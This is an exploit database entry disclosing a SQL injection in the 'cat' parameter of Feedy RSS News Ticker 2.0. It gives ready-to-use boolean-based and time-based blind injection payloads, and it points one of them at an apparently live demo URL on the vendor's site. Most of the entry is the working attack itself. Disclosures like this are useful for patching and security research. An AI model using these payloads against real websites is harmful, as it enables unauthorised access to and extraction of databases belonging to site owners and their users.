22 lines
No EOL
594 B
Text
22 lines
No EOL
594 B
Text
# Exploit Title: Feedy RSS News Ticker 2.0 - 'cat' SQL Injection
|
|
# Dork: N/A
|
|
# Date: 2018-05-22
|
|
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
|
|
# Vendor Homepage: https://codecanyon.net/item/feedy-rss-news-ticker/5818277
|
|
# Version: 2.0
|
|
# Category: Webapps
|
|
# Tested on: Kali linux
|
|
|
|
# PoC: SQLi:
|
|
# Parameter: cat
|
|
# Type: boolean-based blind
|
|
# Demo: http://target/feedy/category.php?cat=
|
|
# Payload:
|
|
|
|
cat=akkus+keyney' AND 2367=2367 AND 'NKyC'='NKyC
|
|
|
|
# Type: AND/OR time-based blind
|
|
# Demo: http://demo.cudevo.com/feedy/category.php?cat=1
|
|
# Payload:
|
|
|
|
cat=akkus+keyney' AND SLEEP(5) AND 'AEHg'='AEHg |